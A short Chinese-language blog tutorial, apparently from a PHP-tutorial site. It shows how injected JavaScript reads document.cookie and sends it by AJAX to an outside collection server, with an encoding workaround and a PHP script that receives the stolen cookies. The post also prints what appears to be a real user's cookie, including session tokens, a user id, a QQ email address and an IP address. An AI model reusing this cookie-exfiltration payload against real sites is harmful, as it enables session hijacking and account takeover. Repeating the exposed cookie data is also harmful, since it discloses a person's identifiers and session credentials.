在渗透的过程中,可以在网页中插入JS代码来获取cookie:document.cookie
那么获取到的cookie如何传到我们自己的服务器呢?
在这里,我使用的是AJAX技术。但是Ajax有一个跨域的问题,所以需要再http头部再进行设置。这里主要讲cookie的提交。
先看一段JS代码:
xmlhttp.open("GET","http://192.168.17.63/HelloPhp/receiveCookie.php?cookie="+document.cookie,true);
这里将从网页获取到的cookie提交到receiveCookie.php上,其中cookie有一部分是这样的:
ULV=1450275143055:1:1:1:182.138.174.191_1450275139.121259:;SGUID=1450275146558_35957829; vjuids=-37098b091.151ab228f90.0.920dc7c7;vjlast=1450275148;SUP=cv%3D1%26bt%3D1450275168%26et%3D1450361568%26d%3D40c3%26i%3D2611%26us%3D1%26vf%3D0%26vt%3D0%26ac%3D2%26st%3D0%26lt%3D1%26uid%3D2277147785%26user%3D493354115%2540qq.com%26ag%3D4%26name%3D493354115%2540qq.com%26nick%3D%25E7%25BB%25BF%25E8%258C%25B66888%26sex%3D1%26ps%3D0%26email%3D%26dob%3D%26ln%3D493354115%2540qq.com%26os%3D%26fmp%3D%26lcp%3D;SUBP=0033WrSXqPxfM725Ws9jqgMF55529P9D9W5o5Vidv35CH47We9hTzl.1; ALF=1481811169;
那么提交的过程中遇到特殊字符"%","&"等,就会自动解析,导致传参数错误。
解决的办法是:
var cookie = document.cookie;
cookie = escape(encodeURIComponent(cookie));
xmlhttp.open("GET","http://192.168.17.63/HelloPhp/receiveCookie.php?cookie="+cookie,true);
在receiveCookie.php接收即可:
$cookie = $_GET["cookie"];
$cookie = (urldecode($cookie));
以上就介绍了Php提交包含特殊字符的参数的方法,包括了方面的内容,希望对PHP教程有兴趣的朋友有所帮助。
